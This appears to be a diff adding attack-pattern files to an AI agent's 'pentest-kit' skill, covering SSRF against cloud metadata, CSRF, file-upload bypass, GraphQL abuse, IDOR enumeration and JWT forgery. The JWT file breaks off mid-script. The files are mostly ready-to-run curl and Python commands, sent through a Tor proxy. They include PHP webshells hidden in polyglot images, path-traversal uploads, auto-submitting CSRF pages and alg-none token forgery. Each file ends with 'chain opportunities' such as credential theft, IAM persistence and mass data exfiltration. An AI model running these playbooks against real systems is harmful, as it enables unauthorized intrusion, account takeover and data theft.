+pentest-kit exec bash -c "for IP in 10.0.0.1 10.0.0.2 10.0.0.3 172.17.0.1 172.17.0.2 192.168.1.1; do RESP=\$(curl -sk -o /dev/null -w '%{http_code}' --max-time 3 '$TARGET/api/fetch?url=http://'\$IP'/'); echo \"\$IP -> HTTP \$RESP\"; done"
+```
+
+## Common pitfalls
+
+- **IMDSv2 blocks GET**: AWS IMDSv2 requires a PUT to `/latest/api/token` with TTL header. Pure GET SSRF cannot bypass this without redirect tricks.
+- **GCP requires header**: `Metadata-Flavor: Google` header is mandatory. If the SSRF vector does not forward custom headers, GCP metadata is unreachable.
+- **DNS rebinding blocked**: Some WAFs block `169.254.169.254`. Try decimal IP (`2852039166`), hex (`0xa9fea9fe`), or DNS rebinding services.
+- **URL parsing differences**: Try `http://169.254.169.254@attacker.com`, `http://attacker.com#@169.254.169.254`, or `http://169.254.169.254/../../` depending on the URL parser.
+- **Temporary credentials expire**: AWS STS tokens from metadata have a limited lifetime (typically 6 hours). Act quickly.
+- **Cloud provider detection**: Check `Server` headers, DNS PTR records, IP WHOIS, and ASN to identify the provider.
+
+## Chain opportunities
+
+- **S3 bucket access**: Use extracted AWS credentials to list and download S3 bucket contents.
+- **Secrets Manager**: Access AWS Secrets Manager, GCP Secret Manager, or Azure Key Vault with stolen tokens.
+- **RCE via Lambda/Functions**: If the role has Lambda invoke permissions, execute arbitrary code.
+- **Lateral movement**: Use credentials to access other cloud resources (RDS, EC2, EKS).
+- **Persistence**: Create new IAM users or access keys for persistent access.
+- **Data exfiltration**: Access databases, object storage, or message queues using cloud credentials.

--- a/.claude/skills/pentest-kit/patterns/csrf-origin-crafting.md
+++ b/.claude/skills/pentest-kit/patterns/csrf-origin-crafting.md
@@ -1,0 +1,158 @@
+# Pattern: CSRF Origin Crafting
+
+## When to use
+
+- Application performs state-changing operations (POST/PUT/DELETE) with cookie-based auth
+- Testing whether cross-site requests can trigger actions on behalf of authenticated users
+- Goal is to bypass CSRF protections and generate a working proof-of-concept
+
+## Prerequisites
+
+- Authenticated session with cookie-based authentication
+- Identified state-changing endpoint (password change, email update, fund transfer)
+- Proxy running: `pentest-kit proxy tor`
+
+## Step-by-step
+
+### Step 1: Identify the target action and capture the legitimate request
+
+```bash
+pentest-kit exec bash -c "curl -sk -v '$TARGET/api/profile/email' -X POST -b 'session=VALID_SESSION_COOKIE' -H 'Content-Type: application/x-www-form-urlencoded' -d 'email=original@example.com' 2>&1 | grep -iE '(cookie|csrf|token|origin|referer|x-requested)'"
+```
+
+### Step 2: Check SameSite cookie attribute
+
+```bash
+pentest-kit exec bash -c "curl -sk -v '$TARGET/login' -X POST -d 'username=testuser&password=testpass' 2>&1 | grep -i 'set-cookie'"
+```
+
+Look for `SameSite=Strict`, `SameSite=Lax`, or `SameSite=None`. If absent, browser defaults to Lax.
+
+- **Strict**: CSRF via cross-site link impossible. Only same-site requests send cookie.
+- **Lax**: GET requests from cross-site send cookie, but POST does not. Try method override.
+- **None**: Cookie sent on all cross-site requests. CSRF likely possible if no token.
+
+### Step 3: Test without CSRF token
+
+Strip the CSRF token from the request and see if the server still accepts it.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/profile/email' -X POST -b 'session=VALID_SESSION_COOKIE' -H 'Content-Type: application/x-www-form-urlencoded' -d 'email=csrf-test@evil.com' -w '\n--- HTTP %{http_code} ---' -o /tmp/csrf-notoken.txt && cat /tmp/csrf-notoken.txt"
+```
+
+If HTTP 200 with success, the endpoint lacks CSRF protection.
+
+### Step 4: Test with empty or tampered CSRF token
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/profile/email' -X POST -b 'session=VALID_SESSION_COOKIE' -H 'Content-Type: application/x-www-form-urlencoded' -d 'email=csrf-test@evil.com&csrf_token=' -w '\n--- HTTP %{http_code} ---' -o /tmp/csrf-empty.txt && cat /tmp/csrf-empty.txt"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/profile/email' -X POST -b 'session=VALID_SESSION_COOKIE' -H 'Content-Type: application/x-www-form-urlencoded' -d 'email=csrf-test@evil.com&csrf_token=aaaa' -w '\n--- HTTP %{http_code} ---' -o /tmp/csrf-tamper.txt && cat /tmp/csrf-tamper.txt"
+```
+
+### Step 5: Test Origin and Referer header bypass
+
+Check if server validates Origin/Referer headers.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/profile/email' -X POST -b 'session=VALID_SESSION_COOKIE' -H 'Origin: https://evil.com' -d 'email=csrf-test@evil.com' -w '\n--- HTTP %{http_code} ---' -o /tmp/csrf-origin.txt && cat /tmp/csrf-origin.txt"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/profile/email' -X POST -b 'session=VALID_SESSION_COOKIE' -H 'Referer: https://evil.com/attack' -d 'email=csrf-test@evil.com' -w '\n--- HTTP %{http_code} ---' -o /tmp/csrf-referer.txt && cat /tmp/csrf-referer.txt"
+```
+
+Try subdomain tricks if the server validates partially:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/profile/email' -X POST -b 'session=VALID_SESSION_COOKIE' -H 'Origin: https://target.com.evil.com' -d 'email=csrf-test@evil.com' -w '\n--- HTTP %{http_code} ---'"
+```
+
+### Step 6: Test HTTP method override to bypass Lax SameSite
+
+If SameSite=Lax blocks POST, try converting to GET or using method override.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/profile/email?email=csrf-test@evil.com' -X GET -b 'session=VALID_SESSION_COOKIE' -w '\n--- HTTP %{http_code} ---' -o /tmp/csrf-get.txt && cat /tmp/csrf-get.txt"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/profile/email' -X POST -b 'session=VALID_SESSION_COOKIE' -H 'X-HTTP-Method-Override: GET' -d 'email=csrf-test@evil.com' -w '\n--- HTTP %{http_code} ---'"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/profile/email?_method=POST' -X GET -b 'session=VALID_SESSION_COOKIE' -w '\n--- HTTP %{http_code} ---'"
+```
+
+### Step 7: Test Content-Type bypass
+
+Some CSRF protections only apply to `application/x-www-form-urlencoded`. Try JSON.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/profile/email' -X POST -b 'session=VALID_SESSION_COOKIE' -H 'Content-Type: text/plain' -d '{\"email\":\"csrf-test@evil.com\"}' -w '\n--- HTTP %{http_code} ---' -o /tmp/csrf-ct.txt && cat /tmp/csrf-ct.txt"
+```
+
+### Step 8: Test CSRF token reuse across users
+
+Get a token as User A and use it for User B request.
+
+```bash
+pentest-kit exec bash -c "TOKEN_A=\$(curl -sk '$TARGET/profile' -b 'session=SESSION_A' | grep -oP 'csrf[_-]?token[\"\\x27]?\\s*[:=]\\s*[\"\\x27]?\\K[a-zA-Z0-9_-]+'); echo \"Token A: \$TOKEN_A\"; curl -sk '$TARGET/api/profile/email' -X POST -b 'session=SESSION_B' -d \"email=csrf-test@evil.com&csrf_token=\$TOKEN_A\" -w '\n--- HTTP %{http_code} ---'"
+```
+
+### Step 9: Generate proof-of-concept HTML
+
+```bash
+pentest-kit exec bash -c "cat > /tmp/csrf-poc.html << 'HTML'
+<html>
+<body>
+<h1>CSRF Proof of Concept</h1>
+<form id=\"csrf\" action=\"TARGET_URL/api/profile/email\" method=\"POST\">
+  <input type=\"hidden\" name=\"email\" value=\"attacker@evil.com\"/>
+</form>
+<script>document.getElementById('csrf').submit();</script>
+</body>
+</html>
+HTML
+echo 'PoC saved to /tmp/csrf-poc.html'
+echo 'Replace TARGET_URL with actual target. Host on attacker server and visit while authenticated.'"
+```
+
+For JSON-based CSRF PoC using fetch:
+
+```bash
+pentest-kit exec bash -c "cat > /tmp/csrf-json-poc.html << 'HTML'
+<html>
+<body>
+<h1>CSRF JSON PoC</h1>
+<script>
+fetch('TARGET_URL/api/profile/email', {
+  method: 'POST',
+  credentials: 'include',
+  headers: {'Content-Type': 'text/plain'},
+  body: JSON.stringify({email: 'attacker@evil.com'})
+});
+</script>
+</body>
+</html>
+HTML
+echo 'JSON CSRF PoC saved to /tmp/csrf-json-poc.html'"
+```
+
+## Common pitfalls
+
+- **Double-submit cookie**: Token in both cookie and form field. Check if they must actually match or if any value works.
+- **Referer stripping**: Some browsers strip Referer on HTTPS-to-HTTP redirects. Test both.
+- **CORS preflight blocks JSON**: `application/json` triggers CORS preflight. Use `text/plain` with JSON body instead.
+- **Framework auto-protection**: Django, Rails, Laravel add CSRF by default. Look for exempted endpoints or misconfigured middleware.
+- **Token per-session vs per-request**: Per-request tokens rotate on every page load. Capture fresh token before each test.
+
+## Chain opportunities
+
+- **Account takeover**: CSRF on password/email change leads to full account compromise.
+- **Privilege escalation**: CSRF on admin actions (add user, change role) performed by tricking admin.
+- **Stored XSS + CSRF**: Use XSS to extract CSRF token and submit forged requests from same origin.
+- **OAuth CSRF**: Attach attacker OAuth account to victim via CSRF on callback endpoint.
+- **Financial fraud**: CSRF on payment or transfer endpoints for monetary impact.

--- a/.claude/skills/pentest-kit/patterns/file-upload-chains.md
+++ b/.claude/skills/pentest-kit/patterns/file-upload-chains.md
@@ -1,0 +1,139 @@
+# Pattern: File Upload Bypass Chains
+
+## When to use
+
+- Application has file upload functionality (avatars, documents, imports)
+- Goal is to upload executable content (webshell, XSS payload, polyglot)
+- Server-side validation needs to be bypassed
+- Testing for path traversal in uploaded filenames
+
+## Prerequisites
+
+- Identified upload endpoint and accepted file types
+- Authenticated session if upload requires login
+- Proxy running: `pentest-kit proxy tor`
+
+## Step-by-step
+
+### Step 1: Baseline -- upload a legitimate file and observe behavior
+
+```bash
+pentest-kit exec bash -c "echo 'legitimate content' > /tmp/test.txt && curl -sk '$TARGET/api/upload' -X POST -F 'file=@/tmp/test.txt' -H 'Authorization: Bearer TOKEN' -o /tmp/upload-resp.json && cat /tmp/upload-resp.json | python3 -m json.tool"
+```
+
+Note the response: file path, URL, content-type returned, any renaming.
+
+### Step 2: Test extension-based bypass
+
+Try alternate extensions that may execute as PHP/ASP/JSP.
+
+```bash
+pentest-kit exec bash -c "for EXT in php phtml php5 php7 pht phar phps shtml; do echo '<?php echo \"PWNED\"; ?>' > /tmp/shell.\$EXT; CODE=\$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET/api/upload' -X POST -F \"file=@/tmp/shell.\$EXT\" -H 'Authorization: Bearer TOKEN'); echo \"\$EXT -> HTTP \$CODE\"; done"
+```
+
+### Step 3: Test content-type manipulation
+
+Upload a PHP file but set Content-Type to image/jpeg.
+
+```bash
+pentest-kit exec bash -c "echo '<?php system(\$_GET[\"cmd\"]); ?>' > /tmp/shell.php && curl -sk '$TARGET/api/upload' -X POST -F 'file=@/tmp/shell.php;type=image/jpeg' -H 'Authorization: Bearer TOKEN' -o /tmp/upload-ct.json && cat /tmp/upload-ct.json"
+```
+
+### Step 4: Test magic bytes bypass
+
+Prepend valid image magic bytes before the payload.
+
+```bash
+pentest-kit exec bash -c "printf '\\x89PNG\\r\\n\\x1a\\n' > /tmp/poly.php.png && echo '<?php system(\$_GET[\"cmd\"]); ?>' >> /tmp/poly.php.png && curl -sk '$TARGET/api/upload' -X POST -F 'file=@/tmp/poly.php.png' -H 'Authorization: Bearer TOKEN' -o /tmp/upload-magic.json && cat /tmp/upload-magic.json"
+```
+
+For JPEG magic bytes:
+
+```bash
+pentest-kit exec bash -c "printf '\\xff\\xd8\\xff\\xe0' > /tmp/poly.php.jpg && echo '<?php system(\$_GET[\"cmd\"]); ?>' >> /tmp/poly.php.jpg && curl -sk '$TARGET/api/upload' -X POST -F 'file=@/tmp/poly.php.jpg;type=image/jpeg' -H 'Authorization: Bearer TOKEN' -o /tmp/upload-jpg.json && cat /tmp/upload-jpg.json"
+```
+
+### Step 5: Test null byte injection in filename
+
+Some parsers truncate at null byte, allowing extension bypass.
+
+```bash
+pentest-kit exec bash -c "echo '<?php system(\$_GET[\"cmd\"]); ?>' > /tmp/shell.php && curl -sk '$TARGET/api/upload' -X POST -F 'file=@/tmp/shell.php;filename=shell.php%00.jpg' -H 'Authorization: Bearer TOKEN' -o /tmp/upload-null.json && cat /tmp/upload-null.json"
+```
+
+### Step 6: Test double extension and case variation
+
+```bash
+pentest-kit exec bash -c "for NAME in 'shell.php.jpg' 'shell.jpg.php' 'shell.PHP' 'shell.pHp' 'shell.php.' 'shell.php%20' 'shell.php::DATA'; do echo '<?php echo 1; ?>' > /tmp/up.tmp; CODE=\$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET/api/upload' -X POST -F \"file=@/tmp/up.tmp;filename=\$NAME\" -H 'Authorization: Bearer TOKEN'); echo \"\$NAME -> HTTP \$CODE\"; done"
+```
+
+### Step 7: Test path traversal in filename
+
+Attempt to write the file outside the upload directory.
+
+```bash
+pentest-kit exec bash -c "echo '<?php system(\$_GET[\"cmd\"]); ?>' > /tmp/trav.php && curl -sk '$TARGET/api/upload' -X POST -F 'file=@/tmp/trav.php;filename=../../../var/www/html/shell.php' -H 'Authorization: Bearer TOKEN' -o /tmp/upload-trav.json && cat /tmp/upload-trav.json"
+```
+
+URL-encoded variant:
+
+```bash
+pentest-kit exec bash -c "echo '<?php system(\$_GET[\"cmd\"]); ?>' > /tmp/trav2.php && curl -sk '$TARGET/api/upload' -X POST -F 'file=@/tmp/trav2.php;filename=..%2f..%2f..%2fvar%2fwww%2fhtml%2fshell.php' -H 'Authorization: Bearer TOKEN' -o /tmp/upload-trav2.json && cat /tmp/upload-trav2.json"
+```
+
+### Step 8: Create a polyglot file (valid image + executable code)
+
+```bash
+pentest-kit exec bash -c "python3 -c \"
+import struct
+# Minimal valid GIF with PHP payload in comment
+gif = b'GIF89a'
+gif += struct.pack('<HH', 1, 1)  # width, height
+gif += b'\\x00\\x00\\x00'  # GCT flag, bg, aspect
+gif += b'\\x21\\xfe'  # comment extension
+payload = b'<?php system(\\\$_GET[\\\"cmd\\\"]); ?>'
+gif += bytes([len(payload)]) + payload
+gif += b'\\x00\\x3b'  # terminator
+with open('/tmp/polyglot.gif.php', 'wb') as f: f.write(gif)
+print('Polyglot created:', len(gif), 'bytes')
+\""
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/upload' -X POST -F 'file=@/tmp/polyglot.gif.php;type=image/gif' -H 'Authorization: Bearer TOKEN' -o /tmp/upload-poly.json && cat /tmp/upload-poly.json"
+```
+
+### Step 9: Verify uploaded shell execution
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/uploads/shell.php?cmd=id' -o /tmp/shell-out.txt && cat /tmp/shell-out.txt"
+```
+
+### Step 10: Test SVG upload for XSS
+
+```bash
+pentest-kit exec bash -c "cat > /tmp/xss.svg << 'SVG'
+<?xml version=\"1.0\" encoding=\"UTF-8\"?>
+<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\">
+  <text x=\"0\" y=\"20\">XSS</text>
+</svg>
+SVG
+curl -sk '$TARGET/api/upload' -X POST -F 'file=@/tmp/xss.svg;type=image/svg+xml' -H 'Authorization: Bearer TOKEN' -o /tmp/upload-svg.json && cat /tmp/upload-svg.json"
+```
+
+## Common pitfalls
+
+- **File is renamed**: Server may hash the filename. Check the response for the actual stored path.
+- **Stored but not served**: Some apps store to S3/CDN with no execution context. Verify the file is accessible.
+- **Image reprocessing**: Libraries like ImageMagick strip non-image data. The polyglot may not survive.
+- **Antivirus on server**: Use obfuscated payloads or test with benign markers first (e.g., `echo CANARY` instead of `system()`).
+- **Size limits**: Large polyglots may be rejected. Keep payloads minimal.
+- **.htaccess upload**: If .htaccess can be uploaded, use it to enable PHP execution in the upload directory.
+
+## Chain opportunities
+
+- **RCE via webshell**: Successful upload leads to remote code execution on the server.
+- **XSS via SVG/HTML**: Stored XSS through uploaded SVG files served to other users.
+- **Path traversal to config overwrite**: Overwrite .htaccess, web.config, or application config files.
+- **DoS via zip bomb**: Upload a zip bomb if the server extracts archives.
+- **SSRF via XXE in uploaded XML/DOCX**: Office documents and XML files may trigger XXE processing.

--- a/.claude/skills/pentest-kit/patterns/graphql-introspection.md
+++ b/.claude/skills/pentest-kit/patterns/graphql-introspection.md
@@ -1,0 +1,135 @@
+# Pattern: GraphQL Introspection and Exploitation
+
+## When to use
+
+- Application exposes a GraphQL endpoint (typically `/graphql` or `/api/graphql`)
+- Goal is to map the entire schema, find sensitive queries/mutations, and exploit authorization flaws
+- Testing for information disclosure, IDOR, batch query abuse, or nested DoS
+
+## Prerequisites
+
+- Identified GraphQL endpoint
+- Authenticated session if the endpoint requires it
+- Proxy running: `pentest-kit proxy tor`
+
+## Step-by-step
+
+### Step 1: Detect the GraphQL endpoint
+
+```bash
+pentest-kit exec bash -c "for PATH in /graphql /api/graphql /graphql/v1 /gql /query /api/v1/graphql; do CODE=\$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET'\$PATH -X POST -H 'Content-Type: application/json' -d '{\"query\":\"{ __typename }\"}'); echo \"\$PATH -> HTTP \$CODE\"; done"
+```
+
+A 200 response with `__typename` data confirms the endpoint.
+
+### Step 2: Run full introspection query
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/graphql' -X POST -H 'Content-Type: application/json' -d '{\"query\":\"{__schema{types{name,kind,fields{name,args{name,type{name,kind,ofType{name}}},type{name,kind,ofType{name}}}}}}\"}' -o /tmp/gql-schema.json && python3 -c \"
+import json
+with open('/tmp/gql-schema.json') as f: data = json.load(f)
+types = data.get('data',{}).get('__schema',{}).get('types',[])
+for t in types:
+    if not t['name'].startswith('__'):
+        fields = t.get('fields') or []
+        field_names = [f['name'] for f in fields]
+        print(f'{t[\\\"kind\\\"]:10} {t[\\\"name\\\"]:30} fields: {field_names[:5]}')
+\""
+```
+
+### Step 3: Extract queries and mutations
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/graphql' -X POST -H 'Content-Type: application/json' -d '{\"query\":\"{__schema{queryType{fields{name,args{name,type{name}}}},mutationType{fields{name,args{name,type{name}}}}}}\"}' -o /tmp/gql-ops.json && python3 -c \"
+import json
+with open('/tmp/gql-ops.json') as f: data = json.load(f)
+schema = data.get('data',{}).get('__schema',{})
+print('=== QUERIES ===')
+for f in (schema.get('queryType') or {}).get('fields',[]):
+    args = ', '.join([a['name'] for a in f.get('args',[])])
+    print(f'  {f[\\\"name\\\"]}({args})')
+print('=== MUTATIONS ===')
+for f in (schema.get('mutationType') or {}).get('fields',[]):
+    args = ', '.join([a['name'] for a in f.get('args',[])])
+    print(f'  {f[\\\"name\\\"]}({args})')
+\""
+```
+
+### Step 4: Test IDOR via query arguments
+
+Query a resource with another user's ID.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/graphql' -X POST -H 'Content-Type: application/json' -H 'Authorization: Bearer TOKEN' -d '{\"query\":\"{ user(id: 1) { id username email role } }\"}' -o /tmp/gql-idor1.json && cat /tmp/gql-idor1.json | python3 -m json.tool"
+```
+
+```bash
+pentest-kit exec bash -c "for ID in \$(seq 1 20); do RESP=\$(curl -sk '$TARGET/graphql' -X POST -H 'Content-Type: application/json' -H 'Authorization: Bearer TOKEN' -d '{\"query\":\"{ user(id: '\$ID') { id username email } }\"}'); echo \"ID \$ID: \$RESP\" | head -1; done"
+```
+
+### Step 5: Test batch queries for data extraction
+
+Send multiple queries in one request to extract data efficiently.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/graphql' -X POST -H 'Content-Type: application/json' -H 'Authorization: Bearer TOKEN' -d '[{\"query\":\"{ user(id: 1) { username email } }\"},{\"query\":\"{ user(id: 2) { username email } }\"},{\"query\":\"{ user(id: 3) { username email } }\"}]' -o /tmp/gql-batch.json && cat /tmp/gql-batch.json | python3 -m json.tool"
+```
+
+### Step 6: Test query aliasing for batch operations
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/graphql' -X POST -H 'Content-Type: application/json' -H 'Authorization: Bearer TOKEN' -d '{\"query\":\"{ u1: user(id: 1) { username } u2: user(id: 2) { username } u3: user(id: 3) { username } u4: user(id: 4) { username } u5: user(id: 5) { username } }\"}' -o /tmp/gql-alias.json && cat /tmp/gql-alias.json | python3 -m json.tool"
+```
+
+### Step 7: Test nested query DoS (query depth attack)
+
+Create deeply nested queries to test for resource exhaustion.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/graphql' -X POST -H 'Content-Type: application/json' -d '{\"query\":\"{ users { posts { comments { author { posts { comments { author { username } } } } } } } }\"}' -w '\nTime: %{time_total}s' -o /tmp/gql-depth.json && head -5 /tmp/gql-depth.json"
+```
+
+### Step 8: Test mutations for unauthorized actions
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/graphql' -X POST -H 'Content-Type: application/json' -H 'Authorization: Bearer TOKEN' -d '{\"query\":\"mutation { updateUser(id: 1, input: { role: \\\"admin\\\" }) { id role } }\"}' -o /tmp/gql-mut.json && cat /tmp/gql-mut.json | python3 -m json.tool"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/graphql' -X POST -H 'Content-Type: application/json' -H 'Authorization: Bearer TOKEN' -d '{\"query\":\"mutation { deleteUser(id: 999) { success } }\"}' -o /tmp/gql-del.json && cat /tmp/gql-del.json | python3 -m json.tool"
+```
+
+### Step 9: Check if introspection is disabled but suggestions leak schema
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/graphql' -X POST -H 'Content-Type: application/json' -d '{\"query\":\"{ use }\"}' -o /tmp/gql-suggest.json && cat /tmp/gql-suggest.json | python3 -m json.tool"
+```
+
+Look for "Did you mean" suggestions that reveal field names.
+
+### Step 10: Automate with graphql-cop or InQL
+
+```bash
+pentest-kit exec bash -c "python3 -m graphql_cop -t '$TARGET/graphql' 2>&1 | tail -30"
+```
+
+```bash
+pentest-kit exec bash -c "inql -t '$TARGET/graphql' -o /tmp/gql-inql 2>&1 && ls /tmp/gql-inql/"
+```
+
+## Common pitfalls
+
+- **Introspection disabled**: Try field suggestion leaks, GET-based queries, or alternative endpoints.
+- **Rate limiting on batch**: Servers may limit batch array size. Start small and increase.
+- **Query depth limits**: Modern GraphQL servers set max depth (typically 7-10). Test incrementally.
+- **Persisted queries**: Some servers only accept pre-registered query hashes. Test with known hashes or check for automatic persisted queries (APQ).
+- **GET vs POST**: Some endpoints accept queries via GET `?query={...}`. Test both methods.
+
+## Chain opportunities
+
+- **IDOR via queries**: Access other users' data by iterating ID arguments.
+- **Privilege escalation via mutations**: Modify roles, permissions, or admin flags.
+- **Data exfiltration**: Batch queries to dump entire collections efficiently.
+- **DoS via nested queries**: Trigger N+1 query problems with deep nesting.
+- **SSRF via custom scalars**: Some implementations fetch URLs from scalar inputs.
+- **SQL injection**: Arguments passed to resolvers may reach database queries unsanitized.

--- a/.claude/skills/pentest-kit/patterns/idor-enumeration.md
+++ b/.claude/skills/pentest-kit/patterns/idor-enumeration.md
@@ -1,0 +1,103 @@
+# Pattern: IDOR Enumeration
+
+## When to use
+
+- Application uses numeric IDs, UUIDs, or sequential identifiers in API paths or parameters
+- You have two or more valid user accounts (User A and User B)
+- Goal is to prove unauthorized access to resources belonging to other users
+- API returns user-specific data (profiles, orders, documents, messages)
+
+## Prerequisites
+
+- Two authenticated sessions with valid tokens/cookies
+- Identified API endpoints that reference object IDs
+- Proxy running: `pentest-kit proxy tor`
+
+## Step-by-step
+
+### Step 1: Authenticate as User A and capture baseline
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":\"userA\",\"password\":\"passA\"}' -o /tmp/idor-authA.json && cat /tmp/idor-authA.json | python3 -m json.tool"
+```
+
+Extract User A token:
+
+```bash
+pentest-kit exec bash -c "TOKEN_A=\$(cat /tmp/idor-authA.json | python3 -c 'import sys,json; print(json.load(sys.stdin)[\"token\"])'); echo \$TOKEN_A > /tmp/tokenA.txt && echo \"Token A: \$TOKEN_A\""
+```
+
+### Step 2: Fetch User A own resource as baseline
+
+```bash
+pentest-kit exec bash -c "TOKEN_A=\$(cat /tmp/tokenA.txt); curl -sk '$TARGET/api/users/USER_A_ID/profile' -H \"Authorization: Bearer \$TOKEN_A\" -o /tmp/idor-baseA.json && cat /tmp/idor-baseA.json | python3 -m json.tool"
+```
+
+### Step 3: Authenticate as User B
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":\"userB\",\"password\":\"passB\"}' -o /tmp/idor-authB.json && TOKEN_B=\$(cat /tmp/idor-authB.json | python3 -c 'import sys,json; print(json.load(sys.stdin)[\"token\"])'); echo \$TOKEN_B > /tmp/tokenB.txt && echo \"Token B: \$TOKEN_B\""
+```
+
+### Step 4: Access User A resource using User B token (IDOR test)
+
+```bash
+pentest-kit exec bash -c "TOKEN_B=\$(cat /tmp/tokenB.txt); curl -sk '$TARGET/api/users/USER_A_ID/profile' -H \"Authorization: Bearer \$TOKEN_B\" -w '\n--- HTTP %{http_code} ---' -o /tmp/idor-crossB.json && cat /tmp/idor-crossB.json | python3 -m json.tool"
+```
+
+If HTTP 200 with User A data is returned, IDOR is confirmed.
+
+### Step 5: Diff responses to confirm data leakage
+
+```bash
+pentest-kit exec bash -c "diff <(cat /tmp/idor-baseA.json | python3 -m json.tool) <(cat /tmp/idor-crossB.json | python3 -m json.tool) && echo 'IDENTICAL - IDOR confirmed' || echo 'DIFFERENT - check manually'"
+```
+
+### Step 6: Enumerate sequential IDs to find other resources
+
+```bash
+pentest-kit exec bash -c "TOKEN_B=\$(cat /tmp/tokenB.txt); for ID in \$(seq 1 50); do CODE=\$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET/api/users/'\$ID'/profile' -H \"Authorization: Bearer \$TOKEN_B\"); echo \"ID \$ID -> HTTP \$CODE\"; done"
+```
+
+### Step 7: Test IDOR on write operations (PUT/DELETE)
+
+```bash
+pentest-kit exec bash -c "TOKEN_B=\$(cat /tmp/tokenB.txt); curl -sk '$TARGET/api/users/USER_A_ID/profile' -X PUT -H \"Authorization: Bearer \$TOKEN_B\" -H 'Content-Type: application/json' -d '{\"email\":\"attacker@evil.com\"}' -w '\n--- HTTP %{http_code} ---' -o /tmp/idor-write.json && cat /tmp/idor-write.json"
+```
+
+### Step 8: Test IDOR with UUID/GUID enumeration
+
+If IDs are UUIDs, check if they leak elsewhere (e.g., public profiles, API listings).
+
+```bash
+pentest-kit exec bash -c "TOKEN_B=\$(cat /tmp/tokenB.txt); curl -sk '$TARGET/api/users' -H \"Authorization: Bearer \$TOKEN_B\" -o /tmp/idor-list.json && cat /tmp/idor-list.json | python3 -c 'import sys,json; [print(u.get(\"id\",\"?\"), u.get(\"username\",\"?\")) for u in json.load(sys.stdin).get(\"users\",[])[:20]]'"
+```
+
+### Step 9: Test parameter pollution and alternate ID formats
+
+```bash
+pentest-kit exec bash -c "TOKEN_B=\$(cat /tmp/tokenB.txt); curl -sk '$TARGET/api/profile?user_id=USER_A_ID&user_id=USER_B_ID' -H \"Authorization: Bearer \$TOKEN_B\" -o /tmp/idor-hpp.json && cat /tmp/idor-hpp.json | python3 -m json.tool"
+```
+
+### Step 10: Automate with ffuf for large-scale enumeration
+
+```bash
+pentest-kit exec bash -c "TOKEN_B=\$(cat /tmp/tokenB.txt); seq 1 1000 > /tmp/ids.txt && ffuf -u '$TARGET/api/users/FUZZ/profile' -w /tmp/ids.txt -H \"Authorization: Bearer \$TOKEN_B\" -mc 200 -o /tmp/idor-ffuf.json -of json 2>&1 | tail -20"
+```
+
+## Common pitfalls
+
+- **Rate limiting**: Space requests to avoid lockouts. Use `-rate 10` flag in ffuf.
+- **UUIDs are not immune**: Check for UUID leakage in HTML source, API responses, or error messages.
+- **403 vs 404**: A 403 confirms the resource exists (access denied). A 404 may mean it does not exist or the server hides it.
+- **Write IDOR is higher severity**: Always test PUT, PATCH, DELETE alongside GET.
+- **Encoded IDs**: Some apps use base64-encoded or hashed IDs. Decode and test the underlying value.
+- **Nested resources**: Test `/api/orgs/ORG_ID/users/USER_ID` -- both IDs may be vulnerable.
+
+## Chain opportunities
+
+- **Account takeover**: Write IDOR on email/password fields leads to full account compromise.
+- **Data exfiltration**: Enumerate all user profiles, orders, or documents for mass data extraction.
+- **Privilege escalation**: Access admin-only resources by guessing admin user IDs.
+- **Business logic abuse**: Modify other users' orders, subscriptions, or payment methods.
+- **PII exposure**: Combine with report generation to demonstrate regulatory impact (GDPR, HIPAA).

--- a/.claude/skills/pentest-kit/patterns/jwt-attack-triage.md
+++ b/.claude/skills/pentest-kit/patterns/jwt-attack-triage.md
@@ -1,0 +1,151 @@
+# Pattern: JWT Attack Triage
+
+## When to use
+
+- Application uses JSON Web Tokens for authentication or authorization
+- JWT found in Authorization header, cookies, or URL parameters
+- Goal is to forge, tamper, or bypass JWT validation
+
+## Prerequisites
+
+- Valid JWT captured from authenticated session
+- Target URL that validates JWT
+- Proxy running: `pentest-kit proxy tor`
+
+## Step-by-step
+
+### Step 1: Capture and decode the JWT
+
+Extract the token and inspect its header and payload.
+
+```bash
+pentest-kit exec bash -c "JWT='<paste-token-here>'; echo \$JWT | cut -d. -f1 | base64 -d 2>/dev/null | python3 -m json.tool; echo '---PAYLOAD---'; echo \$JWT | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool"
+```
+
+Record the algorithm (`alg` field), key ID (`kid` if present), and any claims (`sub`, `role`, `admin`).
+
+### Step 2: Check for algorithm none bypass
+
+Set `alg` to `none` and strip the signature. Works if server does not enforce algorithm.
+
+```bash
+pentest-kit exec bash -c "python3 -c \"
+import base64, json
+header = {'alg': 'none', 'typ': 'JWT'}
+payload = {'sub': 'admin', 'role': 'admin', 'iat': 1700000000, 'exp': 1900000000}
